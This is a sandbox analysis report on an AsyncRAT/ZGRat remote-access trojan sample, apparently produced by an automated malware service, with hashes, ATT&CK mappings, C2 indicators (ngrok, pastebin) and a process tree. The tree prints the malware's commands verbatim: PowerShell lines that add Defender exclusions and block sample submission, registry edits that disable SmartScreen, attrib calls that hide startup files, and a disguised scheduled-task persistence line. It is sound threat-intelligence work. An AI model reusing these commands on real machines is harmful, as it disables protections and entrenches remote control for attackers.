asyncrat | ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
10/05/2024, 02:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
Size

2.2MB
MD5

92612e8a2fc3f5406331b171b6c3b2fa
SHA1

deb4c41292cf8cf0f0187491d1eca4ebb3e47a4f
SHA256

ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade
SHA512

c282a0ae16c1b43799744a4db1f45d229134f1e0b2008a1093f507bf89589b5624a2e0033ad54c00085cb1d80a25adee0a54e7ec19e3cfa600146ccf8aebd497
SSDEEP

49152:/fCXQoEiDfuFdImBttUJkykJVdd4S1OfLKEY8CODmcjVaTofHiMpGv:/fCXQziDHmHu870S0KENlmcIMitv

Score

10^/10

asyncrat zgrat evasion execution rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 2 IoCs

resource	yara_rule
behavioral1/files/0x0037000000014245-45.dat	family_zgrat_v1
behavioral1/memory/2840-62-0x0000000000BF0000-0x0000000000E28000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0037000000014245-45.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2824	powershell.exe
752	powershell.exe
2284	powershell.exe
620	powershell.exe
2824	powershell.exe
752	powershell.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2808	attrib.exe
2728	attrib.exe
2592	attrib.exe

Drops startup file 19 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259397152	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
1712	explorer.exe
2720	update.exe
2840	Explorer .exe
2656	Hide.exe
2860	GoogleUpdate.exe

Loads dropped DLL 13 IoCs

pid	Process
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
664	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
14	0.tcp.eu.ngrok.io
25	0.tcp.eu.ngrok.io
2	pastebin.com
3	pastebin.com
6	pastebin.com
7	0.tcp.eu.ngrok.io

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

pid	Process
2720	update.exe
2720	update.exe
2720	update.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe
2860	GoogleUpdate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1400	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
892	timeout.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage	reg.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
2824	powershell.exe
752	powershell.exe
2284	powershell.exe
620	powershell.exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2720	update.exe
2720	update.exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe
2840	Explorer .exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2840	Explorer .exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	2720	update.exe
Token: SeDebugPrivilege	2860	GoogleUpdate.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2720	update.exe
2840	Explorer .exe
2860	GoogleUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 348 wrote to memory of 1712	348	ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe	28
PID 348 wrote to memory of 1712	348	ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe	28
PID 348 wrote to memory of 1712	348	ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe	28
PID 348 wrote to memory of 1712	348	ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe	28
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2720	1712	explorer.exe	29
PID 1712 wrote to memory of 2840	1712	explorer.exe	30
PID 1712 wrote to memory of 2840	1712	explorer.exe	30
PID 1712 wrote to memory of 2840	1712	explorer.exe	30
PID 1712 wrote to memory of 2840	1712	explorer.exe	30
PID 1712 wrote to memory of 2656	1712	explorer.exe	31
PID 1712 wrote to memory of 2656	1712	explorer.exe	31
PID 1712 wrote to memory of 2656	1712	explorer.exe	31
PID 1712 wrote to memory of 2656	1712	explorer.exe	31
PID 2656 wrote to memory of 316	2656	Hide.exe	32
PID 2656 wrote to memory of 316	2656	Hide.exe	32
PID 2656 wrote to memory of 316	2656	Hide.exe	32
PID 2656 wrote to memory of 316	2656	Hide.exe	32
PID 316 wrote to memory of 2728	316	cmd.exe	34
PID 316 wrote to memory of 2728	316	cmd.exe	34
PID 316 wrote to memory of 2728	316	cmd.exe	34
PID 316 wrote to memory of 2728	316	cmd.exe	34
PID 316 wrote to memory of 2592	316	cmd.exe	35
PID 316 wrote to memory of 2592	316	cmd.exe	35
PID 316 wrote to memory of 2592	316	cmd.exe	35
PID 316 wrote to memory of 2592	316	cmd.exe	35
PID 316 wrote to memory of 2808	316	cmd.exe	36
PID 316 wrote to memory of 2808	316	cmd.exe	36
PID 316 wrote to memory of 2808	316	cmd.exe	36
PID 316 wrote to memory of 2808	316	cmd.exe	36
PID 316 wrote to memory of 2824	316	cmd.exe	37
PID 316 wrote to memory of 2824	316	cmd.exe	37
PID 316 wrote to memory of 2824	316	cmd.exe	37
PID 316 wrote to memory of 2824	316	cmd.exe	37
PID 316 wrote to memory of 752	316	cmd.exe	38
PID 316 wrote to memory of 752	316	cmd.exe	38
PID 316 wrote to memory of 752	316	cmd.exe	38
PID 316 wrote to memory of 752	316	cmd.exe	38
PID 316 wrote to memory of 2284	316	cmd.exe	39
PID 316 wrote to memory of 2284	316	cmd.exe	39
PID 316 wrote to memory of 2284	316	cmd.exe	39
PID 316 wrote to memory of 2284	316	cmd.exe	39
PID 316 wrote to memory of 620	316	cmd.exe	40
PID 316 wrote to memory of 620	316	cmd.exe	40
PID 316 wrote to memory of 620	316	cmd.exe	40
PID 316 wrote to memory of 620	316	cmd.exe	40
PID 316 wrote to memory of 2228	316	cmd.exe	41
PID 316 wrote to memory of 2228	316	cmd.exe	41
PID 316 wrote to memory of 2228	316	cmd.exe	41
PID 316 wrote to memory of 2228	316	cmd.exe	41
PID 316 wrote to memory of 2216	316	cmd.exe	42
PID 316 wrote to memory of 2216	316	cmd.exe	42
PID 316 wrote to memory of 2216	316	cmd.exe	42
PID 316 wrote to memory of 2216	316	cmd.exe	42
PID 316 wrote to memory of 2208	316	cmd.exe	43
PID 316 wrote to memory of 2208	316	cmd.exe	43
PID 316 wrote to memory of 2208	316	cmd.exe	43
PID 316 wrote to memory of 2208	316	cmd.exe	43
PID 2720 wrote to memory of 1840	2720	update.exe	44

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2592	attrib.exe
2808	attrib.exe
2728	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
"C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:348
- C:\Windows\temp\explorer.exe
  "C:\Windows\temp\explorer.exe" -p123
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"' & exit
      4⤵
      PID:1840
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1400
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat""
      4⤵
      Loads dropped DLL
      PID:664
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:892
    - - C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2860
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2840
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:316
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" +s +h
        5⤵
        Sets file to hidden
        Drops startup file
        Views/modifies file attributes
        
        PID:2728
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Users\Admin\AppData\Roaming\*.*" +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2592
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib *.* +s +h
        5⤵
        Sets file to hidden
        Drops startup file
        Views/modifies file attributes
        
        PID:2808
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath 'c:\','d:\','e:\','f:\'.'j:\'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionProcess 'explorer .exe','UPDATE.exe','googleupdate.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"
        5⤵
        
        PID:2228
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1
        5⤵
        Modifies registry class
        
        PID:2216
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
        5⤵
        
        PID:2208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat

Filesize
955B

MD5
fdc8f1d8d7b410678433976973ea8e76

SHA1
1572ec51ef38b39e4702f993a25cf1cbb5914fda

SHA256
462648eaf83a1385b957078d3ee40e5c1ffcc00f80cee3456c02a38d992f0c7b

SHA512
b8c6dd7ba66a0867c3fbc8bcacd1ac9fb67e9548174258ca1f7363ca95d3c39771c12cb0b4d121f0d1e9fe6208c00f21c47fb9a4d100351706fb5e0e1f4bcf1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat

Filesize
156B

MD5
f29fb112f347f45afaa2b54945f4b639

SHA1
8c9e60bbe423b3d63e7d8156d8b934db7326126a

SHA256
756a77c890684613ee95f026c4269ef76af2f7edba00953e3026ba49625fd9b4

SHA512
c4dd15814c736047f6ee4b1d81d6badd321e287e11ef18dcdb2b7b0db4fc74b7547f14ddc4cfef856dbb6ad9dc092588d8096ea261fc6d122e3da4ad3b06188f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dafc68e5d4d1485f1859f56157920d69

SHA1
0cd1e5f95fb1d7876fbb6f11255199965e7031dd

SHA256
7b02fac2670da336f2b51bb553aa0bd920a3e8375e1f94815fefa87cd1ccebb7

SHA512
ad7e5bc76194225a4110a57218c0ec99059783d47f605eda6a524319e8184cb93a38cfbcdc5eaa35c726c52cd545adc7c83d2c0a0da3e95ae23773c20b69534e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe

Filesize
2.2MB

MD5
570c5c4f037ad11d8e3e51d2e9cf5be0

SHA1
0f7e2478ef2741f3e6460bf6b5fa6c135a6c0fc8

SHA256
0c2b77e6f72dd5736aafaddc75cdee19cde2bd621d0c0c93aae517a29de4e237

SHA512
3e5243394ec602098dd11ef77f3ddc0b51d01a8a1ffd829f29b31c237f5e9cf3c011463e619fdc6206bfbee6f0cf43fb681392fd9e1bd35a186e8a059b0beae5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe

Filesize
46KB

MD5
799ce66446d07f987d0e84e50bac4e1f

SHA1
957f18dd1e9047b36c504752fea23b489dd7c4ae

SHA256
29eb1c9a192e737c103da9f99ca3e8ed722fe36d5c3073be006867bb0dc58ca2

SHA512
edd9d33a7fcb765eee0a32a468ac3418f6c23976395b753becafc7bdac160970b89884500d626c5f1476a54f8a3e25bd749c51b956de6ac546efa93a468842de

Download Submit
C:\Windows\Temp\explorer.exe

Filesize
2.3MB

MD5
645c4a1777edc25cbf67a5a5945e3311

SHA1
4985ee60a642ecf0be9b60ab137f30d388c2f9f8

SHA256
f5557bd3226c5973126b6dd4f2b6cf17b672482b38a77dd995ef1e52958b671c

SHA512
999d55213a7c8cfbdebcffde20e8143113940fc350342e88c3f53f839a0bb39786327bcfe40cc9ea9c5f4e98b94ba4302e8f925e1263e5e05007686e05004775

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe

Filesize
1.2MB

MD5
3a7327b010d7f41fdb759fdbaf8134bf

SHA1
ddb00f2c736bad53e82f1ef69919314aaf888131

SHA256
519a0fb3e4753c330054153fc8813bbfbac63c7ce32afe110c5dc558ec6909fa

SHA512
8abfb42add40eadae4aaf5f04edb989f79e6f2d7b080064d488852654f4c17ec08a16cfcfa3947dbf6bf721f113487ef781492d40b281a9a9810946430fd9f90

Download Submit
memory/348-3-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

Filesize
9.9MB

Download
memory/348-9-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

Filesize
9.9MB

Download
memory/348-1-0x00000000002F0000-0x0000000000530000-memory.dmp

Filesize
2.2MB

Download
memory/348-2-0x000000001B3C0000-0x000000001B610000-memory.dmp

Filesize
2.3MB

Download
memory/348-0-0x000007FEF5D83000-0x000007FEF5D84000-memory.dmp

Filesize
4KB

Download
memory/664-114-0x00000000023F0000-0x000000000279E000-memory.dmp

Filesize
3.7MB

Download
memory/1712-29-0x0000000003EC0000-0x000000000426E000-memory.dmp

Filesize
3.7MB

Download
memory/1712-28-0x0000000003EC0000-0x000000000426E000-memory.dmp

Filesize
3.7MB

Download
memory/1712-30-0x0000000003EC0000-0x000000000426E000-memory.dmp

Filesize
3.7MB

Download
memory/1712-31-0x0000000003EC0000-0x000000000426E000-memory.dmp

Filesize
3.7MB

Download
memory/2720-80-0x0000000000AA0000-0x0000000000E4E000-memory.dmp

Filesize
3.7MB

Download
memory/2720-81-0x0000000000AA0000-0x0000000000E4E000-memory.dmp

Filesize
3.7MB

Download
memory/2720-44-0x0000000000AA0000-0x0000000000E4E000-memory.dmp

Filesize
3.7MB

Download
memory/2720-111-0x0000000000AA0000-0x0000000000E4E000-memory.dmp

Filesize
3.7MB

Download
memory/2840-62-0x0000000000BF0000-0x0000000000E28000-memory.dmp

Filesize
2.2MB

Download
memory/2860-116-0x0000000000FA0000-0x000000000134E000-memory.dmp

Filesize
3.7MB

Download
memory/2860-117-0x0000000000FA0000-0x000000000134E000-memory.dmp

Filesize
3.7MB

Download
memory/2860-118-0x0000000000FA0000-0x000000000134E000-memory.dmp

Filesize
3.7MB

Download
memory/2860-121-0x0000000000FA0000-0x000000000134E000-memory.dmp

Filesize
3.7MB

Download